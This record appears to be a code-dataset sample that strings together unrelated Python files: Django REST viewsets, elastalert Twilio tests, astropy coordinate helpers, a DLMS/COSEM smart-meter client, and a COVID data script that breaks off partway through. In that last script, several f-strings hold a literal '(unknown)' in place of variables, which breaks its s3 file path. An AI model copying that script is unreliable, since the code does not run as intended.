| StarcoderdataPython |
26308 | <reponame>AkshayVKumar/ActivityManager<filename>activity/views.py<gh_stars>0
from rest_framework import viewsets
from .serializers import MemberSerializer, ActivityPeriodSerializer
from activity.models import UserProfile, ActivityPeriod
from django.http import JsonResponse
# ViewSet exposing UserProfile records ("members") through the REST API.
class MemberViewSet(viewsets.ModelViewSet):
    # ModelViewSet supplies the standard list/retrieve/create/update/destroy
    # actions for the queryset below.
    queryset = UserProfile.objects.all()
    serializer_class = MemberSerializer
# ViewSet for recording and listing ActivityPeriod entries (activity input).
class ActivityPeriodViewSet(viewsets.ModelViewSet):
    queryset = ActivityPeriod.objects.all()
    serializer_class = ActivityPeriodSerializer
| StarcoderdataPython |
31741 | <reponame>bdunnette/derbot
from django.db.models.signals import pre_save
from django.dispatch import receiver
import random
import fractions
import humanize
# from derbot.names.tasks import generate_number
from derbot.names.models import DerbyName
@receiver(pre_save, sender=DerbyName)
def generate_number(sender, instance, **kwargs):
    """Assign a pseudo-random jersey number just before a DerbyName is saved.

    Only fires when the name is cleared and has no number yet, so existing
    numbers are never overwritten.
    """
    if instance.cleared and not instance.number:
        # Take a random 2-5 character window out of a random float's digits,
        # dropping any leading/trailing decimal point.
        jersey_number = str(random.uniform(1, 9999))[
            random.randint(0, 3) : random.randint(5, 7)
        ].strip(".")
        to_humanize = bool(random.getrandbits(1))
        # Idiomatic truth test instead of the original `== True` comparison.
        if to_humanize:
            # Half the time, render the number as a unicode fraction.
            jersey_number = humanize.fractional(jersey_number).replace("/", "⁄")
        instance.number = jersey_number
| StarcoderdataPython |
3361171 | <reponame>drakaru/elastalert
import pytest
from elastalert.alerters.twilio import TwilioAlerter
from elastalert.loaders import FileRulesLoader
from elastalert.util import EAException
def test_twilio_getinfo():
    """get_info() should report the alerter type and the from-number."""
    rule = {
        'name': '<NAME>',
        'type': 'any',
        'alert_subject': 'Cool subject',
        'twilio_account_sid': 'xxxxx1',
        'twilio_auth_token': '<PASSWORD>',
        'twilio_to_number': 'xxxxx3',
        'twilio_from_number': 'xxxxx4',
        'alert': []
    }
    loader = FileRulesLoader({})
    loader.load_modules(rule)
    alerter = TwilioAlerter(rule)
    assert alerter.get_info() == {
        'type': 'twilio',
        'twilio_client_name': 'xxxxx4'
    }
@pytest.mark.parametrize('twilio_account_sid, twilio_auth_token, twilio_to_number, expected_data', [
    ('', '', '', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
    ('xxxx1', '', '', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
    ('', 'xxxx2', '', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
    ('', '', 'INFO', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
    ('xxxx1', 'xxxx2', '', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
    ('xxxx1', '', 'INFO', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
    ('', 'xxxx2', 'INFO', 'Missing required option(s): twilio_account_sid, twilio_auth_token, twilio_to_number'),
    ('xxxx1', 'xxxx2', 'INFO',
     {
         'type': 'twilio',
         'twilio_client_name': 'xxxxx4'
     }),
])
def test_twilio_required_error(twilio_account_sid, twilio_auth_token, twilio_to_number, expected_data):
    """Missing twilio_* options must surface as a required-option error."""
    # NOTE(review): asserting inside `except Exception` means a case that
    # unexpectedly raises nothing (when an error string was expected) still
    # fails only via the dict comparison, and a raised error when a dict was
    # expected falls into the `in str(ea)` branch with a dict operand.
    # pytest.raises would express the intent more safely -- consider refactoring.
    try:
        rule = {
            'name': 'Test Rule',
            'type': 'any',
            'alert_subject': 'Cool subject',
            'twilio_from_number': 'xxxxx4',
            'alert': []
        }
        # Only add the options that are non-empty for this parametrized case.
        if twilio_account_sid != '':
            rule['twilio_account_sid'] = twilio_account_sid
        if twilio_auth_token != '':
            rule['twilio_auth_token'] = twilio_auth_token
        if twilio_to_number != '':
            rule['twilio_to_number'] = twilio_to_number
        rules_loader = FileRulesLoader({})
        rules_loader.load_modules(rule)
        alert = TwilioAlerter(rule)
        actual_data = alert.get_info()
        assert expected_data == actual_data
    except Exception as ea:
        assert expected_data in str(ea)
@pytest.mark.parametrize('twilio_use_copilot, twilio_message_service_sid, twilio_from_number, expected_data', [
    (True, None, 'test', True),
    (False, 'test', None, True),
])
def test_twilio_use_copilot(twilio_use_copilot, twilio_message_service_sid, twilio_from_number, expected_data):
    """Copilot misconfiguration should raise EAException on alert()."""
    # NOTE(review): if alert() raises nothing, this test passes silently
    # (the assert only runs inside the except); pytest.raises(EAException)
    # would assert the failure explicitly.  Also, the `!= ''` guards are
    # always true for the parametrized values (True/False/None/'test'),
    # so every key is always set -- verify that is intended.
    try:
        rule = {
            'name': 'Test Rule',
            'type': 'any',
            'alert_subject': 'Cool subject',
            'twilio_account_sid': 'xxxxx1',
            'twilio_auth_token': 'xxxxx2',
            'twilio_to_number': 'xxxxx3',
            'alert': []
        }
        if twilio_use_copilot != '':
            rule['twilio_use_copilot'] = twilio_use_copilot
        if twilio_message_service_sid != '':
            rule['twilio_message_service_sid'] = twilio_message_service_sid
        if twilio_from_number != '':
            rule['twilio_from_number'] = twilio_from_number
        rules_loader = FileRulesLoader({})
        rules_loader.load_modules(rule)
        alert = TwilioAlerter(rule)
        match = {
            '@timestamp': '2021-01-01T00:00:00',
            'somefield': 'foobarbaz'
        }
        alert.alert([match])
    except EAException:
        assert expected_data
| StarcoderdataPython |
1736786 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This module contains convenience functions for coordinate-related functionality.
This is generally just wrapping around the object-oriented coordinates
framework, but it is useful for some users who are used to more functional
interfaces.
"""
import warnings
from collections.abc import Sequence
import numpy as np
from .. import units as u
from ..constants import c
from .. import _erfa as erfa
from ..io import ascii
from ..utils import isiterable, data
from .sky_coordinate import SkyCoord
from .builtin_frames import GCRS, PrecessedGeocentric
from .representation import SphericalRepresentation, CartesianRepresentation
from .builtin_frames.utils import get_jd12
__all__ = ['cartesian_to_spherical', 'spherical_to_cartesian', 'get_sun',
'get_constellation', 'concatenate_representations', 'concatenate']
def cartesian_to_spherical(x, y, z):
    """
    Converts 3D rectangular cartesian coordinates to spherical polar
    coordinates.

    The resulting angles are in latitude/longitude (elevation/azimuthal)
    form: the origin is along the equator, not at the north pole.

    .. note::
        This simply wraps `~astropy.coordinates.CartesianRepresentation` and
        `~astropy.coordinates.SphericalRepresentation`; prefer those classes
        directly except for quick one-off conversions.

    Parameters
    ----------
    x : scalar, array-like, or `~astropy.units.Quantity`
        The first cartesian coordinate.
    y : scalar, array-like, or `~astropy.units.Quantity`
        The second cartesian coordinate.
    z : scalar, array-like, or `~astropy.units.Quantity`
        The third cartesian coordinate.

    Returns
    -------
    r : `~astropy.units.Quantity`
        The radial coordinate (in the same units as the inputs).
    lat : `~astropy.units.Quantity`
        The latitude in radians
    lon : `~astropy.units.Quantity`
        The longitude in radians
    """
    # Bare numbers/arrays get a dimensionless unit so the representation
    # classes accept them; existing Quantities pass through untouched.
    x, y, z = (coord if hasattr(coord, 'unit')
               else coord * u.dimensionless_unscaled
               for coord in (x, y, z))

    spherical = CartesianRepresentation(x, y, z).represent_as(
        SphericalRepresentation)
    return spherical.distance, spherical.lat, spherical.lon
def spherical_to_cartesian(r, lat, lon):
    """
    Converts spherical polar coordinates to rectangular cartesian
    coordinates.

    The input angles are expected in latitude/longitude (elevation/azimuthal)
    form: the origin is along the equator, not at the north pole.

    .. note::
        This is a low-level function used internally in `astropy.coordinates`;
        prefer the `astropy.coordinates` coordinate systems for general use.

    Parameters
    ----------
    r : scalar, array-like, or `~astropy.units.Quantity`
        The radial coordinate (in the same units as the inputs).
    lat : scalar, array-like, or `~astropy.units.Quantity`
        The latitude (in radians if array or scalar)
    lon : scalar, array-like, or `~astropy.units.Quantity`
        The longitude (in radians if array or scalar)

    Returns
    -------
    x : float or array
        The first cartesian coordinate.
    y : float or array
        The second cartesian coordinate.
    z : float or array
        The third cartesian coordinate.
    """
    # Attach the conventional default unit to any bare input: dimensionless
    # for the radius, radians for the two angles.
    defaults = ((r, u.dimensionless_unscaled), (lat, u.radian), (lon, u.radian))
    r, lat, lon = (value if hasattr(value, 'unit') else value * unit
                   for value, unit in defaults)

    cartesian = SphericalRepresentation(
        distance=r, lat=lat, lon=lon).represent_as(CartesianRepresentation)
    return cartesian.x, cartesian.y, cartesian.z
def get_sun(time):
    """
    Determines the location of the sun at a given time (or times, if the input
    is an array `~astropy.time.Time` object), in geocentric coordinates.

    Parameters
    ----------
    time : `~astropy.time.Time`
        The time(s) at which to compute the location of the sun.

    Returns
    -------
    newsc : `~astropy.coordinates.SkyCoord`
        The location of the sun as a `~astropy.coordinates.SkyCoord` in the
        `~astropy.coordinates.GCRS` frame.

    Notes
    -----
    The algorithm for determining the sun/earth relative position is based
    on the simplified version of VSOP2000 that is part of ERFA. Compared to
    JPL's ephemeris, it should be good to about 4 km (in the Sun-Earth
    vector) from 1900-2100 C.E., 8 km for the 1800-2200 span, and perhaps
    250 km over the 1000-3000.
    """
    # ERFA epv00 returns Earth's heliocentric and barycentric
    # position/velocity as structured arrays with 'p' and 'v' fields.
    earth_pv_helio, earth_pv_bary = erfa.epv00(*get_jd12(time, 'tdb'))
    # We have to manually do aberration because we're outputting directly into
    # GCRS
    earth_p = earth_pv_helio['p']
    earth_v = earth_pv_bary['v']
    # convert barycentric velocity to units of c, but keep as array for passing in to erfa
    # (note: this in-place division also mutates earth_pv_bary['v'])
    earth_v /= c.to_value(u.au/u.d)
    # Distance to the Sun and the inverse Lorentz factor needed by erfa.ab.
    dsun = np.sqrt(np.sum(earth_p**2, axis=-1))
    invlorentz = (1-np.sum(earth_v**2, axis=-1))**0.5
    # Aberrated unit vector: earth_p/dsun is the Sun->Earth direction, so it
    # (and the velocity) are negated to get the Earth->Sun apparent direction.
    properdir = erfa.ab(earth_p/dsun.reshape(dsun.shape + (1,)),
                        -earth_v, dsun, invlorentz)
    cartrep = CartesianRepresentation(x=-dsun*properdir[..., 0] * u.AU,
                                      y=-dsun*properdir[..., 1] * u.AU,
                                      z=-dsun*properdir[..., 2] * u.AU)
    return SkyCoord(cartrep, frame=GCRS(obstime=time))
# Module-level cache for get_constellation(): filled lazily on first call
# with the parsed constellation boundary table and full-name lookup array.
_constellation_data = {}
def get_constellation(coord, short_name=False, constellation_list='iau'):
    """
    Determines the constellation(s) a given coordinate object contains.

    Parameters
    ----------
    coord : coordinate object
        The object to determine the constellation of.
    short_name : bool
        If True, the returned names are the IAU-sanctioned abbreviated
        names. Otherwise, full names for the constellations are used.
    constellation_list : str
        The set of constellations to use. Currently only ``'iau'`` is
        supported, meaning the 88 "modern" constellations endorsed by the IAU.

    Returns
    -------
    constellation : str or string array
        If ``coords`` contains a scalar coordinate, returns the name of the
        constellation. If it is an array coordinate object, it returns an array
        of names.

    Notes
    -----
    To determine which constellation a point on the sky is in, this precesses
    to B1875, and then uses the Delporte boundaries of the 88 modern
    constellations, as tabulated by
    `Roman 1987 <http://cdsarc.u-strasbg.fr/viz-bin/Cat?VI/42>`_.
    """
    if constellation_list != 'iau':
        # Fixed typo in the error message ("us" -> "is").
        raise ValueError("only 'iau' is currently supported for constellation_list")

    # read the data files and cache them if they haven't been already
    if not _constellation_data:
        cdata = data.get_pkg_data_contents('data/constellation_data_roman87.dat')
        ctable = ascii.read(cdata, names=['ral', 'rau', 'decl', 'name'])
        cnames = data.get_pkg_data_contents('data/constellation_names.dat', encoding='UTF8')
        # Map the 3-letter abbreviation to the full constellation name.
        cnames_short_to_long = dict([(l[:3], l[4:])
                                     for l in cnames.split('\n')
                                     if not l.startswith('#')])
        cnames_long = np.array([cnames_short_to_long[nm] for nm in ctable['name']])

        _constellation_data['ctable'] = ctable
        _constellation_data['cnames_long'] = cnames_long
    else:
        ctable = _constellation_data['ctable']
        cnames_long = _constellation_data['cnames_long']

    isscalar = coord.isscalar

    # if it is geocentric, we reproduce the frame but with the 1875 equinox,
    # which is where the constellations are defined
    # this yields a "dubious year" warning because ERFA considers the year 1875
    # "dubious", probably because UTC isn't well-defined then and precession
    # models aren't precisely calibrated back to then. But it's plenty
    # sufficient for constellations
    with warnings.catch_warnings():
        warnings.simplefilter('ignore', erfa.ErfaWarning)
        constel_coord = coord.transform_to(PrecessedGeocentric(equinox='B1875'))
    if isscalar:
        rah = constel_coord.ra.ravel().hour
        decd = constel_coord.dec.ravel().deg
    else:
        rah = constel_coord.ra.hour
        decd = constel_coord.dec.deg

    # -1 marks "not yet identified"; each boundary row claims the coordinates
    # that fall inside its RA/dec box until none remain.
    constellidx = -np.ones(len(rah), dtype=int)

    notided = constellidx == -1  # should be all
    for i, row in enumerate(ctable):
        msk = (row['ral'] < rah) & (rah < row['rau']) & (decd > row['decl'])
        constellidx[notided & msk] = i
        notided = constellidx == -1
        if np.sum(notided) == 0:
            break
    else:
        raise ValueError('Could not find constellation for coordinates {0}'.format(constel_coord[notided]))

    if short_name:
        names = ctable['name'][constellidx]
    else:
        names = cnames_long[constellidx]

    if isscalar:
        return names[0]
    else:
        return names
def _concatenate_components(reps_difs, names):
    """ Helper function for the concatenate function below. Gets and
    concatenates all of the individual components for an iterable of
    representations or differentials.
    """
    values = []
    for name in names:
        data_vals = []
        for x in reps_difs:
            data_val = getattr(x, name)
            # Promote scalars to shape-(1,) arrays so np.concatenate accepts them.
            data_vals.append(data_val.reshape(1, ) if x.isscalar else data_val)
        concat_vals = np.concatenate(data_vals)
        # Hack because np.concatenate doesn't fully work with Quantity
        # NOTE: `data_val` here is the component of the *last* input, so this
        # implicitly assumes all inputs share a common unit for this component.
        if isinstance(concat_vals, u.Quantity):
            concat_vals._unit = data_val.unit
        values.append(concat_vals)
    return values
def concatenate_representations(reps):
    """
    Combine multiple representation objects into a single instance by
    concatenating the data in each component.

    Currently, all of the input representations have to be the same type. This
    properly handles differential or velocity data, but all input objects must
    have the same differential object type as well.

    Parameters
    ----------
    reps : sequence of representation objects
        The objects to concatenate

    Returns
    -------
    rep : `~astropy.coordinates.BaseRepresentation` subclass
        A single representation object with its data set to the concatenation of
        all the elements of the input sequence of representations.
    """
    if not isinstance(reps, (Sequence, np.ndarray)):
        raise TypeError('Input must be a list or iterable of representation '
                        'objects.')
    # First, validate that the represenations are the same, and
    # concatenate all of the positional data:
    rep_type = type(reps[0])
    if any(type(r) != rep_type for r in reps):
        raise TypeError('Input representations must all have the same type.')
    # Construct the new representation with the concatenated data from the
    # representations passed in
    values = _concatenate_components(reps,
                                     rep_type.attr_classes.keys())
    new_rep = rep_type(*values)
    # Either every input carries an 's' (velocity) differential or none may;
    # a mixture cannot be concatenated meaningfully.
    has_diff = any('s' in rep.differentials for rep in reps)
    if has_diff and any('s' not in rep.differentials for rep in reps):
        raise ValueError('Input representations must either all contain '
                         'differentials, or not contain differentials.')
    if has_diff:
        dif_type = type(reps[0].differentials['s'])
        if any('s' not in r.differentials or
               type(r.differentials['s']) != dif_type
               for r in reps):
            raise TypeError('All input representations must have the same '
                            'differential type.')
        # Concatenate the differential components the same way and re-attach.
        values = _concatenate_components([r.differentials['s'] for r in reps],
                                         dif_type.attr_classes.keys())
        new_dif = dif_type(*values)
        new_rep = new_rep.with_differentials({'s': new_dif})
    return new_rep
def concatenate(coords):
    """
    Combine multiple coordinate objects into a single
    `~astropy.coordinates.SkyCoord`.

    "Coordinate objects" here mean frame objects with data,
    `~astropy.coordinates.SkyCoord`, or representation objects. Currently,
    they must all be in the same frame, but in a future version this may be
    relaxed to allow inhomogenous sequences of objects.

    Parameters
    ----------
    coords : sequence of coordinate objects
        The objects to concatenate

    Returns
    -------
    cskycoord : SkyCoord
        A single sky coordinate with its data set to the concatenation of all
        the elements in ``coords``
    """
    # A scalar coordinate (or any non-iterable) cannot be concatenated.
    if getattr(coords, 'isscalar', False) or not isiterable(coords):
        raise TypeError('The argument to concatenate must be iterable')
    scs = [SkyCoord(coord, copy=False) for coord in coords]
    # Check that all frames are equivalent
    for sc in scs[1:]:
        if not sc.is_equivalent_frame(scs[0]):
            raise ValueError("All inputs must have equivalent frames: "
                             "{0} != {1}".format(sc, scs[0]))
    # TODO: this can be changed to SkyCoord.from_representation() for a speed
    # boost when we switch to using classmethods
    return SkyCoord(concatenate_representations([c.data for c in coords]),
                    frame=scs[0].frame)
| StarcoderdataPython |
3342944 | <reponame>spikefairway/fsVOIManager
#!/usr/bin/env python
# coding: utf-8
__author__ = 'keisu-ma'
import sys
import pandas as pd
from fsVOIManager import mergeFSVOI
def argumentError():
    """Print a usage message to stderr and terminate with a nonzero status.

    The original exited with status 0, which made shell callers believe the
    run succeeded even though the arguments were invalid; usage errors now
    go to stderr and exit with status 1.
    """
    print("Invalid argument!", file=sys.stderr)
    print("Usage: %s input_NIfTI_VOI_file VOI_set_file output_NIfTI_VOI_file" % (sys.argv[0]), file=sys.stderr)
    sys.exit(1)
if __name__ == "__main__":
    # Load argument
    try:
        inFile = sys.argv[1]
        voiSetFile = sys.argv[2]
        outFile = sys.argv[3]
    except ValueError:
        # NOTE(review): plain indexing never raises ValueError, so this branch
        # is unreachable; it likely predates a tuple-unpacking version.
        argumentError()
    except IndexError:
        argumentError()
    # Load VOI set
    # (CSV file describing the VOI merge definitions, read into a DataFrame)
    voidef = pd.read_csv(voiSetFile)
    # Apply VOI set
    mergeFSVOI(inFile, outFile, voidef)
| StarcoderdataPython |
64217 | <reponame>Layty/dlms-cosem<filename>dlms_cosem/clients/dlms_client.py
import contextlib
import logging
from typing import *
import attr
from typing_extensions import Protocol # type: ignore
from dlms_cosem import cosem, dlms_data, enumerations, exceptions, state, utils
from dlms_cosem.clients.blocking_tcp_transport import BlockingTcpTransport
from dlms_cosem.clients.hdlc_transport import SerialHdlcTransport
from dlms_cosem.connection import DlmsConnection
from dlms_cosem.protocol import acse, xdlms
from dlms_cosem.protocol.xdlms import ConfirmedServiceErrorApdu
from dlms_cosem.protocol.xdlms.selective_access import RangeDescriptor
LOG = logging.getLogger(__name__)
class DataResultError(Exception):
    """Raised when retrieving data fails (a GET response reports an error)."""
class ActionError(Exception):
    """Raised when an ACTION request returns an error or unsuccessful status."""
class HLSError(Exception):
    """Raised when the HLS (high-level security) authentication procedure fails."""
class DlmsIOInterface(Protocol):
    """
    Protocol for a class that should be used for transport.

    Implementations include the serial HDLC and blocking TCP transports
    imported above.
    """
    def connect(self) -> None:
        """Open the underlying transport."""
        ...
    def disconnect(self) -> None:
        """Close the underlying transport."""
        ...
    def send(self, bytes_to_send: bytes) -> bytes:
        """Send request bytes and return the raw response bytes."""
        ...
@attr.s(auto_attribs=True)
class DlmsClient:
client_logical_address: int
server_logical_address: int
io_interface: DlmsIOInterface
authentication_method: Optional[enumerations.AuthenticationMechanism] = attr.ib(
default=None
)
password: Optional[bytes] = attr.ib(default=None)
encryption_key: Optional[bytes] = attr.ib(default=None)
authentication_key: Optional[bytes] = attr.ib(default=None)
security_suite: Optional[int] = attr.ib(default=0)
dedicated_ciphering: bool = attr.ib(default=False)
block_transfer: bool = attr.ib(default=False)
max_pdu_size: int = attr.ib(default=65535)
client_system_title: Optional[bytes] = attr.ib(default=None)
client_initial_invocation_counter: int = attr.ib(default=0)
meter_initial_invocation_counter: int = attr.ib(default=0)
dlms_connection: DlmsConnection = attr.ib(
default=attr.Factory(
lambda self: DlmsConnection(
client_system_title=self.client_system_title,
authentication_method=self.authentication_method,
password=self.password,
global_encryption_key=self.encryption_key,
global_authentication_key=self.authentication_key,
use_dedicated_ciphering=self.dedicated_ciphering,
use_block_transfer=self.block_transfer,
security_suite=self.security_suite,
max_pdu_size=self.max_pdu_size,
client_invocation_counter=self.client_initial_invocation_counter,
meter_invocation_counter=self.meter_initial_invocation_counter,
),
takes_self=True,
)
)
@classmethod
def with_serial_hdlc_transport(
cls,
serial_port: str,
client_logical_address: int,
server_logical_address: int,
server_physical_address: Optional[int],
client_physical_address: Optional[int] = None,
baud_rate: int = 9600,
authentication_method: Optional[enumerations.AuthenticationMechanism] = None,
password: Optional[bytes] = None,
encryption_key: Optional[bytes] = None,
authentication_key: Optional[bytes] = None,
security_suite: Optional[int] = 0,
dedicated_ciphering: bool = False,
block_transfer: bool = False,
max_pdu_size: int = 65535,
client_system_title: Optional[bytes] = None,
client_initial_invocation_counter: int = 0,
meter_initial_invocation_counter: int = 0,
):
serial_client = SerialHdlcTransport(
client_logical_address=client_logical_address,
client_physical_address=client_physical_address,
server_logical_address=server_logical_address,
server_physical_address=server_physical_address,
serial_port=serial_port,
serial_baud_rate=baud_rate,
)
return cls(
client_logical_address=client_logical_address,
server_logical_address=server_logical_address,
authentication_method=authentication_method,
password=password,
encryption_key=encryption_key,
authentication_key=authentication_key,
security_suite=security_suite,
dedicated_ciphering=dedicated_ciphering,
block_transfer=block_transfer,
max_pdu_size=max_pdu_size,
client_system_title=client_system_title,
client_initial_invocation_counter=client_initial_invocation_counter,
meter_initial_invocation_counter=meter_initial_invocation_counter,
io_interface=serial_client,
)
@classmethod
def with_tcp_transport(
cls,
host: str,
port: int,
client_logical_address: int,
server_logical_address: int,
authentication_method: Optional[enumerations.AuthenticationMechanism] = None,
password: Optional[bytes] = None,
encryption_key: Optional[bytes] = None,
authentication_key: Optional[bytes] = None,
security_suite: Optional[int] = 0,
dedicated_ciphering: bool = False,
block_transfer: bool = False,
max_pdu_size: int = 65535,
client_system_title: Optional[bytes] = None,
client_initial_invocation_counter: int = 0,
meter_initial_invocation_counter: int = 0,
):
tcp_transport = BlockingTcpTransport(
host=host,
port=port,
client_logical_address=client_logical_address,
server_logical_address=server_logical_address,
)
return cls(
client_logical_address=client_logical_address,
server_logical_address=server_logical_address,
authentication_method=authentication_method,
password=password,
encryption_key=encryption_key,
authentication_key=authentication_key,
security_suite=security_suite,
dedicated_ciphering=dedicated_ciphering,
block_transfer=block_transfer,
max_pdu_size=max_pdu_size,
client_system_title=client_system_title,
client_initial_invocation_counter=client_initial_invocation_counter,
meter_initial_invocation_counter=meter_initial_invocation_counter,
io_interface=tcp_transport,
)
@contextlib.contextmanager
def session(self) -> "DlmsClient":
self.connect()
self.associate()
yield self
self.release_association()
self.disconnect()
def get(
self,
cosem_attribute: cosem.CosemAttribute,
access_descriptor: Optional[RangeDescriptor] = None,
) -> bytes:
self.send(
xdlms.GetRequestNormal(
cosem_attribute=cosem_attribute, access_selection=access_descriptor
)
)
all_data_received = False
data = bytearray()
while not all_data_received:
get_response = self.next_event()
if isinstance(get_response, xdlms.GetResponseNormal):
data.extend(get_response.data)
all_data_received = True
continue
if isinstance(get_response, xdlms.GetResponseWithBlock):
data.extend(get_response.data)
self.send(
xdlms.GetRequestNext(
invoke_id_and_priority=get_response.invoke_id_and_priority,
block_number=get_response.block_number,
)
)
continue
if isinstance(get_response, xdlms.GetResponseLastBlock):
data.extend(get_response.data)
all_data_received = True
continue
if isinstance(get_response, xdlms.GetResponseLastBlockWithError):
raise DataResultError(
f"Error in blocktransfer of GET response: {get_response.error!r}"
)
if isinstance(get_response, xdlms.GetResponseNormalWithError):
raise DataResultError(
f"Could not perform GET request: {get_response.error!r}"
)
return bytes(data)
def set(self, cosem_attribute: cosem.CosemAttribute, data: bytes):
self.send(xdlms.SetRequestNormal(cosem_attribute=cosem_attribute, data=data))
return self.next_event()
def action(self, method: cosem.CosemMethod, data: bytes):
self.send(xdlms.ActionRequestNormal(cosem_method=method, data=data))
response = self.next_event()
if isinstance(response, xdlms.ActionResponseNormalWithError):
raise ActionError(response.error.name)
elif isinstance(response, xdlms.ActionResponseNormalWithData):
if response.status != enumerations.ActionResultStatus.SUCCESS:
raise ActionError(f"Unsuccessful ActionRequest: {response.status.name}")
return response.data
else:
if response.status != enumerations.ActionResultStatus.SUCCESS:
raise ActionError(f"Unsuccessful ActionRequest: {response.status.name}")
return
def associate(
self,
association_request: Optional[acse.ApplicationAssociationRequestApdu] = None,
) -> acse.ApplicationAssociationResponseApdu:
# the aarq can be overridden or the standard one from the connection is used.
aarq = association_request or self.dlms_connection.get_aarq()
self.send(aarq)
response = self.next_event()
# we could have received an exception from the meter.
if isinstance(response, xdlms.ExceptionResponseApdu):
raise exceptions.DlmsClientException(
f"DLMS Exception: {response.state_error!r}:{response.service_error!r}"
)
# the association might not be accepted by the meter
if isinstance(response, acse.ApplicationAssociationResponseApdu):
if response.result is not enumerations.AssociationResult.ACCEPTED:
# there could be an error suppled with the reject.
extra_error = None
if response.user_information:
if isinstance(
response.user_information.content, ConfirmedServiceErrorApdu
):
extra_error = response.user_information.content.error
raise exceptions.DlmsClientException(
f"Unable to perform Association: {response.result!r} and "
f"{response.result_source_diagnostics!r}, extra info: {extra_error}"
)
else:
raise exceptions.LocalDlmsProtocolError(
"Did not receive an AARE after sending AARQ"
)
if self.should_send_hls_reply():
try:
hls_response = self.send_hls_reply()
except ActionError as e:
raise HLSError from e
hls_data = utils.parse_as_dlms_data(hls_response)
if not hls_response:
raise HLSError("Did not receive any HLS response data")
if not self.dlms_connection.hls_response_valid(hls_data):
raise HLSError(
f"Meter did not respond with correct challenge calculation"
)
return response
def should_send_hls_reply(self) -> bool:
return (
self.dlms_connection.state.current_state
== state.SHOULD_SEND_HLS_SEVER_CHALLENGE_RESULT
)
def send_hls_reply(self) -> Optional[bytes]:
return self.action(
method=cosem.CosemMethod(
enumerations.CosemInterface.ASSOCIATION_LN,
cosem.Obis(0, 0, 40, 0, 0),
1,
),
data=dlms_data.OctetStringData(
self.dlms_connection.get_hls_reply()
).to_bytes(),
)
def release_association(self) -> acse.ReleaseResponseApdu:
rlrq = self.dlms_connection.get_rlrq()
self.send(rlrq)
rlre = self.next_event()
return rlre
    def connect(self):
        """Open the underlying IO interface."""
        self.io_interface.connect()
    def disconnect(self):
        """Close the underlying IO interface."""
        self.io_interface.disconnect()
def send(self, *events):
for event in events:
data = self.dlms_connection.send(event)
response_bytes = self.io_interface.send(data)
self.dlms_connection.receive_data(response_bytes)
def next_event(self):
event = self.dlms_connection.next_event()
LOG.info(f"Received {event}")
return event
| StarcoderdataPython |
1748632 | # Import the needed libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import datetime
# For linear regression function
from sklearn.ensemble import GradientBoostingRegressor
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score, mean_squared_error
# For clustering function
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler, OneHotEncoder, PolynomialFeatures
import boto3
from io import StringIO
import warnings
warnings.filterwarnings("ignore")
BUCKETNAME = 'covid-v1-part-3-data-bucket'
def report_date(lag=1, now=None):
    '''
    returns a 'YYYY-MM-DD' string representing the date for the report we
    are running
    lag is an int, representing how many days in the past to run the report,
    the default lag is 1 day
    now is an optional datetime to use as "today"; it defaults to the
    current time (added for testability, backward compatible)
    Note: the previous hand-rolled string arithmetic rolled January back to
    month '0', produced un-padded months such as '2020-9-30', hard-coded
    February to 28 days, and only handled lag crossing a month boundary for
    lag == 1.  Plain datetime subtraction handles all of those correctly.
    '''
    if now is None:
        now = datetime.datetime.now()
    return (now - datetime.timedelta(days=lag)).strftime('%Y-%m-%d')
def jhu_date(date):
    '''
    Convert an ISO 'YYYY-MM-DD' report date into the 'MM-DD-YYYY' form used
    by the Johns Hopkins daily-report filenames.
    date is a string representing the date found by report_date()
    (Removed: an unused `zero` variable and a commented-out zero-padding
    branch — the day substring is already two characters.)
    '''
    year = date[:4]
    month = date[5:7]
    day = date[8:10]
    return f'{month}-{day}-{year}'
def daily_snapshot(datapath, covpath, date, bucket=BUCKETNAME):
    '''
    Merge the daily Johns Hopkins covid totals into the static
    socio-economic data set and upload the result to s3 as
    'updated_snapshot.csv' for use by the models.
    datapath is a string, the relative path through the s3 bucket
    covpath is a string, the relative or absolute path to the daily
    updated covid-19 data from the Johns Hopkins github repo
    date is a string representing the report date
    bucket is a string, the name of the s3 bucket for storage in aws
    NOTE(review): several f-strings below contain a literal '(unknown)'
    that looks like a redacted interpolation field — confirm against the
    original source before relying on the printed messages or the s3 read
    path.
    '''
    # set filename for the daily data
    cov_date = jhu_date(date)
    filename = f'{covpath}/{cov_date}.csv'
    print(f'searching {covpath} for {cov_date}.csv')
    try:
        # create new dataframe with the covid data
        covid = pd.read_csv(filename)
        print(f'SUCCESS, creating "covid" dataframe using (unknown)')
    except:
        # NOTE(review): this bare except only prints; `covid` is left
        # undefined and the next statement will raise NameError — the
        # function cannot actually continue past a failed read.
        print(f'Exception: (unknown) not found. Check your file location or try to run prior day\'s report')
    # strip down the covid data to cases and deaths
    covid = covid[covid['Country_Region']=='US']
    covid['county_state'] = covid['Admin2'] + ' County, ' + covid['Province_State']
    covid.set_index('county_state', inplace=True)
    covid.rename(columns=({
        'Confirmed': 'confirmed_cases',
        'Deaths': 'deaths'
    }), inplace=True)
    covid=covid[['confirmed_cases', 'deaths']]
    # pull in prior collective data set
    filename = 'cov_soc_eco.csv'
    ### DELETE THIS PRINT STATEMENT UPON COMPLETION###
    print(f'searching {datapath} for (unknown)')
    # create new dataframe with the covid data
    full = pd.read_csv(f's3://{bucket}/{datapath}/(unknown)')
    print(f'SUCCESS, creating dataframe using (unknown)')
    # set the index in the dataframe to 'county_state'
    full['county_state'] = full['county'] + ", " + full['state']
    full.set_index('county_state', inplace=True)
    ### This part will vary **********************
    # set the index in the covid dataframe for consistency
    # print the cases and deaths numbers from the old data_set
    print("Think about changing this to be yesterday's numbers:")
    print('cases total on prior data set: ', full['confirmed_cases'].sum())
    print('deaths total on prior data set: ', full['deaths'].sum())
    # open the dataframe confirmed cases and deaths columns for replacement
    full.drop(columns=['confirmed_cases', 'deaths'], inplace=True)
